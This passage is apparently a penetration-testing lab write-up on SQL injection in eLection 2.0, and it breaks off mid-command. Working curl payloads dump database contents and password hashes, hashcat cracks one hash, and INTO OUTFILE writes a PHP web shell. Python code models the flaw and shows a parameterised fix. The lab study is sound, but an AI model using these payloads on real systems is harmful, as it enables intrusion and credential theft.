SQL Injection


A SQL injection vulnerability, CVE-2020-9340, affects the target eLection instance, which runs the outdated version 2.0.

The injection point is the id parameter of a POST request to the /election/admin/ajax/op_kandidat.php endpoint (aksi=fetch). The endpoint only answers for an authenticated admin session and an AJAX-style request, which is why every curl below carries both the PHPSESSID cookie and the X-Requested-With: XMLHttpRequest header.

UNION-based In-band


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,2,3,4,5 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"                   
{"code":"200","nama":"2","kelas":"3","fbid":"5","bio":"4"}
real	0.06s
user	0.01s
sys	0.01s
cpu	18%

5 columns identified. The markers 2, 3, 5 and 4 are reflected in nama, kelas, fbid and bio respectively, so column 2 (nama) is the most convenient slot for extracted data.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,user(),database(),4,@@version -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"newuser@localhost","kelas":"election","fbid":"10.1.44-MariaDB-0ubuntu0.18.04.1","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%
  • The current user is newuser@localhost
  • The current database is election
  • The backend DB version is 10.1.44-MariaDB-0ubuntu0.18.04.1

Databases (UNION-based In-band)


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,schema_name,3,4,5 FROM information_schema.schemata-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"404"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

The application answers with code 404, the same response it gives for a non-existent id, even though the query is syntactically valid.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,schema_name,3,4,5 FROM information_schema.schemata LIMIT 1 OFFSET 0 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"election","kelas":"3","fbid":"5","bio":"4"}
real	0.13s
user	0.01s
sys	0.00s
cpu	5%

The issue is that the backend expects exactly one row from the query (the legitimate lookup returns a single candidate), so a UNION that adds four rows is treated as a miss. Restricting the injected SELECT to one row with LIMIT 1 and stepping through the rows with OFFSET works around this. OFFSET 0 gives the first schema, election.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,schema_name,3,4,5 FROM information_schema.schemata LIMIT 1 OFFSET 1 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"information_schema","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	12%

information_schema, a default DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,schema_name,3,4,5 FROM information_schema.schemata LIMIT 1 OFFSET 2 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"mysql","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.00s
sys	0.00s
cpu	13%

mysql, a default DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,schema_name,3,4,5 FROM information_schema.schemata LIMIT 1 OFFSET 3 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"performance_schema","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

performance_schema, a default DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(schema_name),3,4,5 FROM information_schema.schemata -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"election,information_schema,mysql,performance_schema","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	13%

Or collapse every row into one with GROUP_CONCAT, which satisfies the one-row requirement in a single request: election,information_schema,mysql,performance_schema. Keep in mind that GROUP_CONCAT output is silently truncated at group_concat_max_len (1024 bytes by default on MariaDB 10.1), so long lists should be paged with LIMIT/OFFSET instead.
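To make the single-row constraint concrete, here is an added example (not the eLection source and not the author's code) that models the fetch action in Python over an in-memory SQLite database and drives the three approaches used above against it: the plain UNION that fails, LIMIT 1 OFFSET n paging, and GROUP_CONCAT. The table layout, the column order (id, nama, kelas, bio, fbid) and the "exactly one row or 404" rule are assumptions reconstructed from the responses on this page; a plain schemata table stands in for information_schema.schemata, and SQL string literals use single quotes because no shell quoting is involved. A parameterised version of the lookup is included to show the fix.

```python
"""Offline model of the op_kandidat.php fetch action (added example, not the
eLection source). SQLite stands in for MariaDB, a plain 'schemata' table
stands in for information_schema.schemata, and the column order plus the
'exactly one row or 404' rule are assumptions reconstructed from the
responses in the write-up."""
import sqlite3

COLUMNS = "id, nama, kelas, bio, fbid"   # assumed order: 2->nama, 3->kelas, 4->bio, 5->fbid


def build_db() -> sqlite3.Connection:
    """Constructed sample data: the Love candidate row and four schema names."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tb_kandidat (id INTEGER, nama TEXT, kelas TEXT, bio TEXT, fbid TEXT);
        INSERT INTO tb_kandidat VALUES (1, 'Love', '1', 'admin1', '');
        CREATE TABLE schemata (schema_name TEXT);
        INSERT INTO schemata VALUES ('election'), ('information_schema'),
                                    ('mysql'), ('performance_schema');
    """)
    return conn


def to_response(rows) -> dict:
    """Assumed backend rule: anything but exactly one row is reported as 404."""
    if len(rows) != 1:
        return {"code": "404"}
    _, nama, kelas, bio, fbid = rows[0]
    return {"code": "200", "nama": str(nama), "kelas": str(kelas),
            "fbid": str(fbid), "bio": str(bio)}


def fetch_vulnerable(conn, id_param: str) -> dict:
    # The bug: the request parameter is pasted straight into the SQL text.
    sql = f"SELECT {COLUMNS} FROM tb_kandidat WHERE id = {id_param}"
    return to_response(conn.execute(sql).fetchall())


def fetch_fixed(conn, id_param: str) -> dict:
    # The fix: bind the value. A UNION payload is then just an id that matches nothing.
    sql = f"SELECT {COLUMNS} FROM tb_kandidat WHERE id = ?"
    return to_response(conn.execute(sql, (id_param,)).fetchall())


def union_row(conn, expr: str, source: str, offset: int):
    """Fetch one injected row; column 2 of the UNION is reflected in 'nama'."""
    payload = f"123 UNION SELECT 1,{expr},3,4,5 FROM {source} LIMIT 1 OFFSET {offset} -- -"
    resp = fetch_vulnerable(conn, payload)
    return resp["nama"] if resp["code"] == "200" else None


def union_dump(conn, expr: str, source: str, max_rows: int = 1000) -> list:
    """Page with OFFSET until the endpoint reports 404, i.e. no row is left."""
    out = []
    for offset in range(max_rows):
        value = union_row(conn, expr, source, offset)
        if value is None:
            break
        out.append(value)
    return out


def union_group_concat(conn, expr: str, source: str) -> str:
    """Collapse all rows into one; on MariaDB the result is cut at group_concat_max_len."""
    payload = f"123 UNION SELECT 1,GROUP_CONCAT({expr}),3,4,5 FROM {source} -- -"
    return fetch_vulnerable(conn, payload)["nama"]


if __name__ == "__main__":
    db = build_db()
    print(fetch_vulnerable(db, "123 UNION SELECT 1,schema_name,3,4,5 FROM schemata -- -"))
    print(union_dump(db, "schema_name", "schemata"))
    print(union_group_concat(db, "schema_name", "schemata"))
    print(fetch_fixed(db, "123 UNION SELECT 1,schema_name,3,4,5 FROM schemata -- -"))
```

Against this model the unpaged UNION yields four rows and therefore 404, exactly as seen on the target, while paging returns one schema per request and GROUP_CONCAT returns all of them at once. The parameterised lookup turns the same payload into a harmless non-matching id.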

election DB (UNION-based In-band)


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5 FROM information_schema.tables WHERE table_schema="election"-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"tb_guru,tb_hakpilih,tb_kandidat,tb_level,tb_panitia,tb_pengaturan,tb_polling,tb_siswa","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%

The election DB holds eight tables. The names are Indonesian:
  • tb_guru: teacher
  • tb_hakpilih: voting rights
  • tb_kandidat: candidate
  • tb_level: level
  • tb_panitia: committee
  • tb_pengaturan: settings
  • tb_polling: polling
  • tb_siswa: student

The tb_panitia (committee) table looks most relevant, as it is the likeliest place for the admin accounts.

election.tb_panitia Table (UNION-based In-band)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(column_name),3,4,5 FROM information_schema.columns WHERE table_schema="election" AND table_name="tb_panitia"-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"id,no_induk,nama,level,password","kelas":"3","fbid":"5","bio":"4"}
real	0.06s
user	0.00s
sys	0.00s
cpu	12%

The columns are id, no_induk, nama, level and password, i.e. id, registration number (nomor induk), name, level and password.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(nama,":",password),3,4,5 FROM election.tb_panitia-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love:bb113886b0513a9d882e3caa5cd73314","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	19%

That is the credential hash of the Love account: a 32-character hex string, the length of an unsalted MD5 digest. The plaintext password of the Love account was already disclosed in the card.php file.

mysql DB (UNION-based In-band)


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5 FROM information_schema.tables WHERE table_schema="mysql"-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"column_stats,columns_priv,db,event,func,general_log,gtid_slave_pos,help_category,help_keyword,help_relation,help_topic,host,index_stats,innodb_index_stats,innodb_table_stats,plugin,proc,procs_priv,proxies_priv,roles_mapping,servers,slow_log,table_stats,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zone_transition,time_zone_transition_type,user","kelas":"3","fbid":"5","bio":"4"}
real	0.06s
user	0.01s
sys	0.00s
cpu	15%

mysql.user Table (UNION-based In-band)

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(column_name),3,4,5 FROM information_schema.columns WHERE table_schema="mysql" AND table_name="user"-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,Event_priv,Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections,plugin,authentication_string,password_expired,is_role,default_role,max_statement_time","kelas":"3","fbid":"5","bio":"4"}
real	0.07s
user	0.00s
sys	0.00s
cpu	12%

The User and Password columns are the ones of interest.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,GROUP_CONCAT(user,":",Password),3,4,5 FROM mysql.user-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11,newuser:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19","kelas":"3","fbid":"5","bio":"4"}
real	0.06s
user	0.01s
sys	0.00s
cpu	13%
  • root:9CFBBC772F3F6C106020035386DA5BBBF1249A11
  • newuser:2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19

Both stored values are mysql_native_password hashes, a * followed by 40 hex characters of SHA1(SHA1(password)). The * is stripped above because hashcat mode 300 expects only the 40 hex characters.

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ hashcat -a 0 -m 300 hashes.txt /usr/share/wordlists/rockyou.txt                             
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
2470c0c06dee42fd1618bb99005adca2ec9d1e19:password         
Approaching final keyspace - workload adjusted.           
 
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 300 (MySQL4.1/MySQL5)
Hash.Target......: hashes.txt
Time.Started.....: Tue Jul  1 23:23:02 2025 (2 secs)
Time.Estimated...: Tue Jul  1 23:23:04 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  7739.2 kH/s (0.39ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/2 (50.00%) Digests (total), 1/2 (50.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[216361726f6c796e] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 21%
 
Started: Tue Jul  1 23:23:01 2025
Stopped: Tue Jul  1 23:23:05 2025

The newuser hash cracks to password; the root hash was not recovered from rockyou.txt (status Exhausted, 1/2 digests). The newuser credential may be reusable against the target's phpMyAdmin instance.
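An added check, not part of the original write-up: recompute the mysql_native_password format in Python to confirm both what was exfiltrated from mysql.user and the hashcat result offline. The two hashes are the ones shown above; the candidate list is a constructed stand-in for rockyou.txt (all of these words are in rockyou, which hashcat exhausted without recovering the root hash, so the outcome matches).

```python
"""Re-derive the mysql.user hash format and re-check the crack offline
(added example). Hashes are the values exfiltrated above; CANDIDATES is a
constructed stand-in for a wordlist."""
import hashlib


def mysql_native_password(password: str) -> str:
    """MySQL 4.1+ / MariaDB mysql_native_password: '*' + HEX(SHA1(SHA1(password)))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()   # raw 20 bytes, not hex
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def to_hashcat_mode_300(stored: str) -> str:
    """hashcat -m 300 wants the 40 hex characters without the leading '*'."""
    if not (stored.startswith("*") and len(stored) == 41):
        raise ValueError("not a mysql_native_password hash: " + stored)
    return stored[1:].lower()


# From mysql.user via the UNION query above.
EXFILTRATED = {
    "root": "*9CFBBC772F3F6C106020035386DA5BBBF1249A11",
    "newuser": "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19",
}

# Constructed mini wordlist standing in for rockyou.txt.
CANDIDATES = ["123456", "qwerty", "letmein", "password", "admin"]


def crack(stored_hashes: dict, candidates) -> dict:
    """Dictionary attack. The scheme is unsalted, so one hash computation per
    candidate is compared against every account at once."""
    by_hash = {}
    for user, stored in stored_hashes.items():
        by_hash.setdefault(stored.upper(), []).append(user)
    recovered = {}
    for cand in candidates:
        for user in by_hash.get(mysql_native_password(cand), []):
            recovered.setdefault(user, cand)
    return recovered


if __name__ == "__main__":
    for user, stored in EXFILTRATED.items():
        print(user, to_hashcat_mode_300(stored))
    print(crack(EXFILTRATED, CANDIDATES))
```

Because the format is unsalted, every candidate is hashed once and compared against all accounts; that is also why hashcat reports "1 unique salts" for the two digests.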

File Write (UNION-based In-band)


The phpinfo.php file reveals DOCUMENT_ROOT, the web root directory: /var/www/html. The application lives under /election, so the shell goes into /var/www/html/election/.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,"<?php system($_GET['cmd']); ?>",3,4,5 INTO OUTFILE "/var/www/html/election/shell.php" -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"404"}
real	0.05s
user	0.01s
sys	0.00s
cpu	13%

Writing a PHP web shell into /var/www/html/election/shell.php. The 404 is expected and says nothing about success: SELECT ... INTO OUTFILE produces no result set, so the PHP code has no row to serialise. The write itself only succeeds if newuser holds the FILE privilege, secure_file_priv does not exclude the path, and the directory is writable by the MariaDB OS user. INTO OUTFILE also refuses to overwrite an existing file, so a retry under the same name fails just as silently; the next step verifies the write instead of assuming it.

File Read (UNION-based In-band)


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '123 UNION SELECT 1,LOAD_FILE("/var/www/html/election/shell.php"),3,4,5 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"1\t<?php system($_GET[cmd]); ?>\t3\t4\t5\n","kelas":"3","fbid":"5","bio":"4"}
real	0.05s
user	0.01s
sys	0.00s
cpu	15%

Confirmed: LOAD_FILE (which needs the same FILE privilege) reads the file back. Two details are worth noticing. First, all five selected columns were written, tab-separated with a trailing newline; the stray 1, 3, 4, 5 are harmless because PHP echoes anything outside the <?php ... ?> tags. Second, the file contains $_GET[cmd] rather than $_GET['cmd']: the single quotes around cmd closed and reopened the shell's single-quoted echo string, so they never reached the database. PHP 7 treats the bare word as an undefined constant, falls back to the string "cmd" and emits a warning, so the shell still works; PHP 8 throws an Error on undefined constants, in which case the quotes must be escaped or double quotes used inside the payload.

Execute (UNION-based In-band)


Moving on to the Exploitation phase.

Boolean-based Blind


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 or 1=1 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=7e2upj17parhml40bpq65aucg9' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.01s
cpu	16%

Confirmed: the always-true condition returns a row. One control is still missing here before the channel can be trusted: a known-false condition has to produce the other response. With a base id that exists (id=1), 1 OR <false> still matches the id=1 row, so an OR probe returns Love whether the condition holds or not. Send 1 AND 1=2 -- - (expect 404) next to 1 AND 1=1 -- - (expect 200), or combine OR with a non-existent base id such as 123, and then read the responses below as TRUE only when that negative control behaves.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM dual WHERE user() LIKE "new%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"   
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM dual WHERE user()="newuser@localhost") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"  
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%

The current user is newuser@localhost. FROM dual is a dummy placeholder table and may be omitted in MariaDB/MySQL, as the next probes do.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) WHERE database() LIKE "ele%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"  
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) WHERE database()="election") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"      
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	17%

The current database is election.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM dual WHERE version() LIKE "10%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"  
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM dual WHERE version() LIKE "10.1.44-MariaDB-0ubuntu0%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM dual WHERE version()="10.1.44-MariaDB-0ubuntu0.18.04.1") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%

The backend DB version is 10.1.44-MariaDB-0ubuntu0.18.04.1.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR EXISTS(SELECT 1 FROM dual WHERE database()="election") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR EXISTS(SELECT 1 WHERE user()="newuser@localhost") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"     
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	15%

EXISTS works just as well and is arguably cleaner: it yields a proper boolean rather than relying on COUNT(*) being 0 or 1.

Databases (Boolean-based Blind)


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(schema_name) FROM information_schema.schemata)=4-- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

COUNT(schema_name)=4 holds, so there are 4 databases in total.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name LIKE "e%") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"              
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	14%
 
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="election") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

election DB, which is the current DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="information_schema") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	16%

The default information_schema DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="performance_schema") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.00s
sys	0.00s
cpu	16%

The default performance_schema DB.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(*) FROM information_schema.schemata WHERE schema_name="mysql") -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli"             
{"code":"200","nama":"Love","kelas":"1","fbid":"","bio":"admin1"}
real	0.05s
user	0.01s
sys	0.00s
cpu	14%

The default mysql DB.

election DB (Boolean-based Blind)


┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/election1]
└─$ sqli=$(echo '1 OR (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema="election")=8 -- -') ; time curl -H "X-Requested-With: XMLHttpRequest" -b 'PHPSESSID=a3j3angf9b4nm5eq449kp0ah51' -s "http://$IP/election/admin/ajax/op_kandidat.php" --data "aksi=fetch&id=$sqli" 
